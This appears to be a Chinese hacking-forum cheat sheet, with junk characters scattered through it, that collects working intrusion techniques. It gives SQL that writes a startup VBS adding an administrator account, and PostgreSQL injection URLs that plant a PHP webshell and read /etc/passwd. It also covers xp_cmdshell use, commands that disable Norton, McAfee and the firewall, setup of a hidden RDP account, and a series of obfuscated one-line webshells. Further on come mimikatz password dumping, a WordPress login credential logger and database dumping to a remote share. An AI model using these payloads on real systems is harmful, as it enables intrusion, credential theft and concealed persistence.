: J ^6 V2 \ `2 D a* xcreate table a (cmd text);7 Z! N8 F2 o6 ^0 @
insert into a values ("set wshshell=createobject (""wscript.shell"") " );( m6 y( A7 L" B- m
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
' F" @( Z9 w$ p+ [, k6 d. }9 _insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " ); @* C& S3 |6 @1 Y) g
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";& h8 K1 s: N$ T( M; J' V! F$ a q
drop table a;( s1 B7 D9 v9 W2 b
& f% C1 K7 C9 ]4 b* | B' l英文版本:8 |' }- ~* F$ ?- O/ P: W7 r( H) v
* {1 z3 y5 o& {, U3 Iuse test;
+ R# M8 @( w. m. E; u. W+ s$ U6 Xcreate table a (cmd text);
$ o7 z- G% y: B% z7 `, L# C/ ?insert into a values ("set wshshell=createobject (""wscript.shell"") " );, h: ]3 n$ w) Q; C! a
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );% e; @& C& L, `% `9 t g6 c8 n5 w0 \
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
1 i5 X6 d6 E+ \. Q5 Pselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";: I: h' M& O8 O% b* g/ Z4 J5 m
drop table a;+ t) R7 C* M6 ]3 {1 m# H
3 ~$ T9 ]+ b; kcreate table a (cmd BLOB);
$ n0 p( E+ _9 O2 E! Dinsert into a values (CONVERT(木马的16进制代码,CHAR));
0 V( b. Q$ X% i; a) K0 M* I$ Gselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
, y1 M8 Y6 z# X; U8 d" V- g% E5 odrop table a;% I* P( B6 n# Z8 q! t( J
3 L; O; [& E- ?2 {8 z; C- R N
记录一下怎么处理变态诺顿- a/ u" e8 n9 }& i( Y; K
查看诺顿服务的路径
* z$ l$ ~0 M4 ~ E7 [5 `. ~sc qc ccSetMgr: Q6 Q9 r3 o7 G; i% V
然后设置权限拒绝访问。做绝一点。。
0 J/ {9 m! ^/ T5 Icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system& c$ ^3 {5 {2 A+ D3 n2 l
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
- l: Q& H# [/ e- |& [( Bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators8 I! S/ x) t9 K( K! J( i6 y
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
- _. j1 U9 a% D+ P, ~# ~1 d9 ?% m4 j* N8 q% e8 Z3 y
然后再重启服务器 w2 [: o' Z; i4 S# F1 P
iisreset /reboot) K7 `7 G! C8 B
这样就搞定了。。不过完事后。记得恢复权限。。。。
+ n! ^5 H+ E# d7 c& I" Fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F7 t0 P- P& m9 l* J" I7 T' P
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
" Q7 F {2 U/ k- }1 Ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
5 K. F( Z) L% z+ Y' m- _cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
) ]5 {; u9 n! S+ x# k# R8 lSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
! g' B* Z5 H% {. N' s8 B5 C* C1 ? ^9 l$ v
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')& f7 C( z5 L& C, J3 ~
' @9 F& S+ F- J0 T% O8 Jpostgresql注射的一些东西6 |2 i$ J3 a: {' A, O4 n
如何获得webshell
7 f: _" U% ]. r/ L+ S3 ?+ l& ahttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); : M$ ~; N; h! G% [1 Y% f* H& p) E
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
! p! Y! t' P; F+ p4 \http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
, Y" {' a! Y/ K5 @1 G如何读文件
0 x @% F( h6 g& N9 u' mhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
2 y! C: M3 V" q% ^9 d- yhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;6 |( [% l6 _2 C3 `' C- ~# g+ a
http://127.0.0.1/postgresql.php?id=1;select * from myfile;4 } c" H( I9 X! B J) o
+ A9 t3 _. q" T) T/ t6 ^. m
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
3 J+ h( m) X3 e/ ]" _当然,这些的postgresql的数据库版本必须大于8.X
; R/ L4 Q. L% [# \创建一个system的函数:
+ @9 m* s* f3 L4 r vCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
: u% t8 W* s9 m8 J: ?6 ]. E- {% ~- }- B9 |* q; }
创建一个输出表:6 p' J6 N! k. o5 [ u+ s
CREATE TABLE stdout(id serial, system_out text)- g0 e/ I) w" ]" d1 f
8 B* P3 h9 z" ?8 ~( N4 j+ @
执行shell,输出到输出表内: d: M' Z6 J- Q
SELECT system('uname -a > /tmp/test')' Q3 j1 q0 r' t( J& b7 D5 B
& X/ f5 x: {7 T5 [, O+ S' a
copy 输出的内容到表里面;
# G2 t, n0 s- w0 @ RCOPY stdout(system_out) FROM '/tmp/test'
: P. Z( c! ~: H w, U' M2 J0 P7 J" I
从输出表内读取执行后的回显,判断是否执行成功4 j, g9 Y6 y$ f
4 C7 w* m" Y' X9 D: _1 ?
SELECT system_out FROM stdout( F% u+ h/ Y* ]& [, J
下面是测试例子
! N* H7 z- s' A2 E T1 _) \$ g% Q/ q) p( K. ~; x; g1 U
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- $ L1 k& }7 c, M
, C7 c5 [8 Y+ o% X/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'$ m$ d% h8 J: n- q. M1 Z+ w6 }
STRICT --6 K' }( [* O. R: @9 h/ A4 b; f; z
/ z4 z7 N4 z( c4 B: x/store.php?id=1; SELECT system('uname -a > /tmp/test') --) N, f5 K. F& _$ x6 N* n( r# w* [
3 r* J7 Y* p7 V( s) t5 |7 r+ x- ]
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
2 J5 q3 I% V* c' S% v+ I0 ^7 y) R
6 ~! d: E1 J+ s* V1 A/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--* h7 E n$ z( Z) f" w1 {- M
net stop sharedaccess stop the default firewall) {* |- X' v$ ^5 O3 P) o; R O
netsh firewall show show/config default firewall& Q6 c+ I4 V7 a4 W5 V1 B
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall" c6 T9 \! y% u7 |# R. T0 F/ C4 C+ U
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
( j- Y6 M, S9 n, `修改3389端口方法(修改后不易被扫出)
$ L, w9 j0 d; ~- I修改服务器端的端口设置,注册表有2个地方需要修改
- _3 o; i; X: {! ~. a( e! l9 ?( \+ L! d R' U- s! I/ y( w
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
- m! h3 v0 u2 v' u- i& U0 [PortNumber值,默认是3389,修改成所希望的端口,比如6000
9 ~3 U- J# j6 O8 w9 W( S6 z) A5 M; f
第二个地方:! n; W" |! i) x3 g4 J5 ^$ N$ a
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
?3 Y/ S/ W0 R* B) F% @PortNumber值,默认是3389,修改成所希望的端口,比如6000
( o, R# q, K' m; J2 {* A- }' E. I' }9 J
现在这样就可以了。重启系统就可以了
5 o, p7 d' c$ w) q2 c/ m' Q
2 c! y' Z5 w5 n) M查看3389远程登录的脚本
- J; l# M9 H1 x, I( G. Q) H2 D保存为一个bat文件' U1 J! s) N- j Y. m8 d
date /t >>D:\sec\TSlog\ts.log
7 Y1 N+ h2 |0 ~6 v- @$ s9 t* Dtime /t >>D:\sec\TSlog\ts.log
/ r" U. X, F6 Anetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
" U; ^3 @* ^! ^8 ^7 pstart Explorer9 m8 i9 k! }& K" X, o) @
0 J. q5 } ]" b5 z! K+ g# {5 t; Fmstsc的参数:
& A! Q4 {: j+ }* }. n& q" F, b. S, G8 y
远程桌面连接) e* `; M) H% ?
" Z M; Z2 p. D0 L8 ~# a. L* C9 P
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]/ |8 g( T& z6 L3 U9 v6 r
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
' \$ {* J; R" ]! Q. ~, i+ w N* j! B q6 n& m
<Connection File> -- 指定连接的 .rdp 文件的名称。+ f! {2 m3 y8 [/ U& a3 W
3 {4 d1 y: b6 p; @8 h
/v:<server[:port]> -- 指定要连接到的终端服务器。
7 _( ~9 T& E' [6 W: R. l# |' e4 E5 T; U7 J
/console -- 连接到服务器的控制台会话。
$ N) ~: V* c) m# i0 `" w* B4 u+ J, p% D1 ~
/f -- 以全屏模式启动客户端。
& C" _8 z4 n, b: g
( J u% k! F3 i, X/w:<width> -- 指定远程桌面屏幕的宽度。
- G$ [& I; `$ E$ L8 P6 M8 l) m: R' n. l) Y; M1 z9 ]
/h:<height> -- 指定远程桌面屏幕的高度。
1 {1 z! E+ c! [1 s1 V. ?4 q) W9 z& O5 r: G6 z6 Y- @
/edit -- 打开指定的 .rdp 文件来编辑。& x* F6 |% J: e3 l/ {% N% ^, o
" x9 r$ ?+ y% _2 ?/migrate -- 将客户端连接管理器创建的旧版9 E+ _ O2 w/ W2 K2 }
连接文件迁移到新的 .rdp 连接文件。2 C. I' w2 f8 z S
. g8 G4 |$ v. ] U. s# e
3 |6 D) k/ f7 o7 @ E: @ }其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
- r, M/ W+ m4 l6 ^" ?$ Kmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
& A! E* f6 H+ Y0 ]# m, `$ D$ x1 h$ j7 C3 h4 o3 j0 M
命令行下开启3389
: B1 ~8 d8 A3 w1 Vnet user asp.net aspnet /add1 c1 Y! B0 U- N0 u3 Q
net localgroup Administrators asp.net /add
4 L$ l: b% a0 W" f9 v) u lnet localgroup "Remote Desktop Users" asp.net /add
1 u' c$ z& c3 y) Vattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
7 x! S# Q. a" d& O1 U2 U, Becho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0" i9 ^) y" d* l2 J5 L) @
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
- U/ i4 g. ~( k% _. Lecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
) L% [/ Z3 x Ysc config rasman start= auto3 u2 e" u, f3 A/ k) ^
sc config remoteaccess start= auto
) P0 e! W3 U+ v) y; vnet start rasman
- `+ \1 V( w' P+ w6 nnet start remoteaccess
1 `- j. b- N! j' C& c, f7 LMedia
& G: ]( l! u/ ^, \+ X<form id="frmUpload" enctype="multipart/form-data"9 x8 ?' t2 |+ l& ?
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>; s) f# S. R8 d
<input type="file" name="NewFile" size="50"><br>5 o. g+ j$ Z) \/ p7 v ^' {: C
<input id="btnUpload" type="submit" value="Upload">
1 d- e- t5 Q! r/ F R) N9 |</form># w+ g' r$ Q$ O: k4 T* G# l
5 B5 }6 h! x8 O2 Y1 L9 {9 K) b9 o0 Lcontrol userpasswords2 查看用户的密码
) w+ M9 T) N. h) G- y& B* Naccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径/ |- C- p' }8 Y5 p; W
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
' V8 Z/ ?* G/ t$ A/ k$ f
_# B* V0 S$ d/ m. ^0 }141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:/ h( ?/ W! x% _& X, H$ V
测试1: z$ p4 j! w( X0 p: F0 G: _4 R& g
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1! ^1 A1 `0 M& H# D+ U4 S
" G; \+ @9 C/ q4 e7 p
测试2:
' c' S- m& y) L8 V% |" i+ R& Q6 ?6 v' ~5 S
create table dirs(paths varchar(100),paths1 varchar(100), id int)
! j2 I7 F7 O1 V% u2 l: n1 S
1 I- T' @; k8 n K" t; }delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--% M( B8 X6 a. \7 G& X
" l" @3 G9 L! h" `1 L4 USELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
$ |3 S( K$ Z1 n+ X. L. |关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令7 n; {8 \7 {; h1 \; O, I" n' F
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
4 R* n% G+ ^$ s2 I9 Fnet stop mcafeeframework
# W7 _; d) U3 z& r$ wnet stop mcshield
; k% x% W/ o2 q' X N f2 }/ J4 Y# f' mnet stop mcafeeengineservice) _% L0 G' H' \ I/ I
net stop mctaskmanager
6 Y# D9 A. Y" i* Zhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D1 C8 R6 f3 ^) C& R( Y T
. v |# `! U% k, z! v! D, G( }
VNCDump.zip (4.76 KB, 下载次数: 1)
9 ?# W, G6 X' ^: ]+ p密码在线破解http://tools88.com/safe/vnc.php7 Q, g" ?+ O5 d; |. ^0 D+ f: M
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
y3 Z" x, }/ d, S# T3 C2 a7 j8 H+ @& P7 b# v- a$ r' W. U
exec master..xp_cmdshell 'net user'
% A; ?6 b/ w$ Q; ^% L& B) B; O; K3 Gmssql执行命令。
X- N3 t) k$ c* L0 a# o& g获取mssql的密码hash查询
4 D% y5 ]) i1 N6 tselect name,password from master.dbo.sysxlogins
5 B/ B8 A# L# r& [0 J/ F; E
: x& ?! _+ W; M# U% g) P0 ?" fbackup log dbName with NO_LOG;
I; u# Z6 ~5 |4 ebackup log dbName with TRUNCATE_ONLY;/ ^0 X8 o3 l% K; ?; H
DBCC SHRINKDATABASE(dbName);
6 z% s4 N4 T7 bmssql数据库压缩
* |! @) I7 L0 j( }! R" M
) J: c5 k, j0 W* jRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK& A6 r6 H, E; _: Z
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
2 u" C ]! Z X& i" x( L4 u8 o U' i3 G! |8 z8 g
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'0 |) Y. _4 m3 d1 m! K1 r
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
P3 h$ j2 O+ W6 V
1 f" M A, W( e! x% G# X, V0 ?Discuz!nt35渗透要点:8 C8 h- I$ j1 n# C! n& @' K
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default: z, Y, j C: J- k* \
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>2 ^' G9 M, F. n* F# Z, ]4 `3 o
(3)保存。9 o0 l' P7 N* z+ ~% i# K
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass' D' v0 Q4 D% D8 |7 k1 b, X( b
d:\rar.exe a -r d:\1.rar d:\website\9 y# i* X% Z' l" a# y7 Y5 N8 U5 C
递归压缩website
/ r: g- Z# ?5 Y* x注意rar.exe的路径' X; i# g9 f% \! ^' s
: {% j- w9 E2 D' D<?php
3 X9 l7 }. c- ]& p
2 `$ }& Q w8 }5 k# Z3 t6 {- S& l$telok = "0${@eval($_POST[xxoo])}";
. p1 F- N% z: }3 n3 U5 v
( [$ U1 K( H! I9 f, n: N$username = "123456";9 W; o' x H, p: P
$ b7 \- k& o7 ?" k$userpwd = "123456";4 E. p& H! ~* N( w; j
+ K0 k* O* a3 V- ? v7 I# C( r! Y( |$telhao = "123456";, W! U H! }+ e* x
3 Q# i, e: G! P: Q' |: v
$telinfo = "123456";$ Z% H ~3 `! F3 @
7 O' ?) L2 l6 E: @, @* Q! h+ K* b
?>
, N; l7 g8 e9 V" z. _* i/ N$ ophp一句话未过滤插入一句话木马
9 F) |' |1 k& ~' ]! g/ G3 `. E% S
# r! r4 F1 P0 V5 s p- W6 r站库分离脱裤技巧" v* u+ d- c4 w; X+ c$ E" p
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"': K1 V4 t$ J8 Q/ _. e+ B9 h
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
$ B/ W @ l( k4 C; }' \# w条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
! Q: T3 Y$ t- y. [这儿利用的是马儿的专家模式(自己写代码)。
3 H7 k4 `% {, j' o* P; j. D( Zini_set('display_errors', 1);
M; E( Y& Y. J6 k% K8 Oset_time_limit(0);( |+ @7 y4 ~8 w" ~
error_reporting(E_ALL);
3 \: y; l# ^3 s" `/ Z0 X& P$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
7 c6 @- w/ F$ Pmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
. d5 z( Q3 o% e! O/ p7 D$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());5 C% z8 h5 \+ L; m; r. l
$i = 0;
: F) j& F- n& a4 U. l1 [7 e% O$tmp = '';
8 n* B2 D4 z' ]. H0 Gwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
5 W8 r( |* B R. O- { $i = $i+1;5 h% N* T, b7 @# E- q* M( ^
$tmp .= implode("::", $row)."\n";
: [1 K9 q! c3 b4 X if(!($i%500)){//500条写入一个文件: E3 u h4 y7 `
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
7 p1 F' E5 W/ p/ t ~. \8 q% Q file_put_contents($filename,$tmp);1 W! C1 U' D! l# D# p
$tmp = '';, E7 S) ?+ o5 q: C! e4 y
}+ t; F7 E0 D' {+ ?
}
1 ?5 F c# H& M6 `mysql_free_result($result);
7 V T$ s `/ }, x/ y5 g% W# p1 a- u/ {
9 v6 f& u3 J/ J0 b, x
) _# p3 h- D8 h" M/ b" e# g//down完后delete( i8 [- y" C6 h/ S( ~2 u, t
, p; f, ~, m/ ], j2 W
2 f$ d* V/ `, Y
ini_set('display_errors', 1);; z$ B4 j( a& ~. L( P/ X/ G6 Y
error_reporting(E_ALL);
/ j5 }3 I, n9 J$i = 0;
1 V2 h6 m5 A* a& e0 Dwhile($i<32) {
+ T, s; w/ Y Q& H $i = $i+1;
! o/ a+ m# l1 _7 O* V% R $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';. }# j+ r" @* N6 P
unlink($filename);1 A" u1 t# D5 s1 S" H$ I, E# r
} c9 c, S3 b3 f6 h' ?
httprint 收集操作系统指纹% L5 P0 P% I3 R k1 A5 K
扫描192.168.1.100的所有端口
9 `7 V; e7 y( d, mnmap –PN –sT –sV –p0-65535 192.168.1.100$ ~' Q+ T5 v% R
host -t ns www.owasp.org 识别的名称服务器,获取dns信息) `& N7 T) g6 `0 `. p6 C
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
1 T5 l: E/ e1 x1 pNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host2 j" u% w% v. k
( V- v- r# E, ~4 U8 tDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
9 P( n8 R2 |9 l9 I) a+ z" p) H5 d7 T. v$ c4 n; d# L
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
! `5 A7 R; Q0 H0 x
4 Q, ~% x/ w( |" g Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
1 H0 U0 V# {( d6 D6 d7 S6 h( r4 _5 i" E! R# o4 e2 ~
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)" ?- n, p# l% |# z2 h
( a9 N/ w! i, e) I( R http://net-square.com/msnpawn/index.shtml (要求安装)
& }; I, {. }. d2 u4 M- z" K9 ^" I5 W& c/ ^% Q
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
3 e7 i' t3 S/ j, ?! H, U; P O9 k- M4 L
: D; N4 |1 R- t2 s, o SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
) w- U" l6 U( ` h- G/ l7 F# Hset names gb2312, ~. h8 T0 T5 r) v& |0 Z
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。# [ ?& X; h0 u. [; Y
' r! m3 r* b0 B5 hmysql 密码修改7 n; d/ [6 _6 _3 y4 h7 z7 j
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
7 P( @9 Y4 |- x, c/ t) q bupdate user set password=PASSWORD('antian365.com') where user='root';* s2 P3 `7 ~' V- }, c" e5 j
flush privileges;
& c6 W8 a5 \% F, D; y高级的PHP一句话木马后门- w7 O' ?# j) [ y5 q3 e* A: @& p* ?
6 J8 I. z O1 c/ a* J: J2 D入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀 F# |5 V8 J/ {& `
u3 | V1 L$ t7 r. M; }
1、
* n4 K$ Y' z2 e2 r, J
! k4 Q7 {( G& S* c6 `$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
" `5 x5 S: r3 u/ ?: w _0 B } @+ T7 y
$hh("/[discuz]/e",$_POST['h'],"Access");
0 L! y u8 I; D
4 c( x4 X5 X/ Y, Z% C2 t7 {//菜刀一句话
$ h/ I; w& y, _
$ \0 ? P0 m, D9 r$ E2、
) D# V4 j' C$ b6 d- E
0 b# Q- X$ \8 }+ v$filename=$_GET['xbid'];3 C1 U- ?/ H, D% W
u, ]- c6 m" Qinclude ($filename);
; i7 l! Q4 H$ U) x& Y ` l& I6 k- `) m$ F
//危险的include函数,直接编译任何文件为php格式运行 T. W7 s; \1 k3 f
3 k5 H b: P( o, b9 ^$ O% U
3、* f( T b3 e2 A; b: ~
: b4 T" g* I( z( q3 s$reg="c"."o"."p"."y";' x# Q9 U3 f; j( C7 P
# I9 H3 T! `8 B P o
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
h3 b& W7 B9 Q% W/ d7 S. ~9 L+ M( Z9 q% Q, |+ V Z/ Z
//重命名任何文件
: c$ X) _* H' l& F( ~2 H) G
" @. ]0 H/ X1 s" i$ D4、
: @% R9 c. m' X# b4 C" p. d1 H H# T; E% j
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";% p' M) F/ G4 v u( U I6 R
0 R* t8 d) V* ~) P h5 j3 V
$gzid("/[discuz]/e",$_POST['h'],"Access");- b1 b2 G: n" f0 G* b
, ?, F: Q3 `$ z W' t
//菜刀一句话
# H. w3 O* F1 G4 j- y& W
8 `* Y0 x" F" b; C9 C2 _ b5、include ($uid);( v, d) d' k/ C" O4 i3 c- \
5 Z. O) }; z7 a! s. ^6 h ^7 m
//危险的include函数,直接编译任何文件为php格式运行,POST * `/ q. _2 h( g) B7 I/ _
( g" O% S7 G! T$ K9 @! c7 F
0 _ s& @/ {- y2 ~//gif插一句话" L' \6 T/ F. i, j
& @! r4 V$ o. f2 i) ]( V6、典型一句话
+ Y5 q. ~4 ?* C8 m; j# D) X( O+ R/ F6 P8 x
程序后门代码3 y6 E [8 Q- T, i, a$ D6 ~- e
<?php eval_r($_POST[sb])?>( ^ G: ~1 `- d$ R' Z7 `
程序代码
) B. m, c- u5 k2 d* i<?php @eval_r($_POST[sb])?>
& A& N }1 E: V v, @7 R//容错代码
2 D! l# [" b* b$ i9 n# {程序代码" v1 @+ K. Y4 ~5 M$ p0 `+ i" \. O
<?php assert($_POST[sb]);?>
) L' n# s$ r% N- Q% F% C//使用lanker一句话客户端的专家模式执行相关的php语句' l3 W2 e- x- r6 W( `' T
程序代码+ X% H# E1 s5 n% B
<?$_POST['sa']($_POST['sb']);?>) \( U9 |( U1 M+ d
程序代码4 L+ M4 ^& d5 `( g: F4 r
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
) k* v" K- d. ~ h8 F) _6 l程序代码3 F4 ?3 D" f( a- m6 T! @$ ^% }
<?php7 S! B7 p( }2 O s8 C6 F# i
@preg_replace("/[email]/e",$_POST['h'],"error");7 ~: ^$ ]% E7 ?; m
?>
1 N. c0 h6 B+ T//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
6 ]: d" ^$ T4 Z8 o9 w程序代码0 r0 i6 Q8 @/ J9 H T+ L) B6 j
<O>h=@eval_r($_POST[c]);</O>9 J! x6 B9 A- a# s( h- ^
程序代码
4 p6 {/ M y+ i' f- R! f# @<script language="php">@eval_r($_POST[sb])</script>% z4 I: J) b1 V8 O0 F" u3 E/ B
//绕过<?限制的一句话8 L) a" U g' i. t
% ]: ]1 Z6 b& ?* F6 g6 X
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
) T4 u/ D9 `* a" }2 [& `详细用法:, \* z! M% l! w/ K# H# Z' a6 {! K7 j
1、到tools目录。psexec \\127.0.0.1 cmd
4 q5 m0 [* ]& ~- x" U2、执行mimikatz4 _! i t4 i2 ~' i* A; C/ C
3、执行 privilege::debug
) u& x8 v( }5 p9 V0 N$ N% q4、执行 inject::process lsass.exe sekurlsa.dll% F/ M$ u" j8 B% r
5、执行@getLogonPasswords
9 [9 Z( z+ Z6 Q, w1 l6、widget就是密码( Q$ v) h _) x' Z1 [& s
7、exit退出,不要直接关闭否则系统会崩溃。
+ M' @* Z& w6 Y/ n1 f- Y, {% B+ E. f$ c y6 M- r+ Y7 n- U
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
8 R& Q$ Z( T& j$ x/ D3 d, B" T" G5 `% |0 a! V& z4 ~' Q7 p% l
自动查找系统高危补丁* `! W2 Z+ Q6 \& N* y
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
4 j* m4 ^9 m& g- U! k- l) m+ V) N2 @
突破安全狗的一句话aspx后门
; [& J* S% H! ~: I9 s5 k3 ]<%@ Page Language="C#" ValidateRequest="false" %>
6 O" D0 z7 }1 n<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>$ n9 G2 E) W8 R! I
webshell下记录WordPress登陆密码
" ]! w* n8 _5 J& ?; h; Nwebshell下记录Wordpress登陆密码方便进一步社工& f/ F/ }2 E: b/ a
在文件wp-login.php中539行处添加:2 g* F p: ?4 Z, J
// log password
; M/ y! r) d; n! W, h/ H$log_user=$_POST['log'];
1 A$ i3 n- J0 v/ r1 H) |9 Q$log_pwd=$_POST['pwd'];
3 B+ c- i! V3 G; |; ~$log_ip=$_SERVER["REMOTE_ADDR"];" n2 W" c! ^! p. W3 [8 S
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;/ ]: D; @& D3 [$ r6 d& z$ `
$txt=$txt.”\r\n”;
- h# N* b. L0 S; x5 j }$ dif($log_user&&$log_pwd&&$log_ip){& z5 n8 R. d$ X$ ?
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);' L3 r" ]$ @: h! W7 I# s
}
' j0 N* a! m( G0 m, m. z当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。) G+ p: @! k0 U
就是搜索case ‘login’$ k4 B& x! `& \$ H7 Q
在它下面直接插入即可,记录的密码生成在pwd.txt中,
; u& Y2 `7 v" S% X% K ~其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
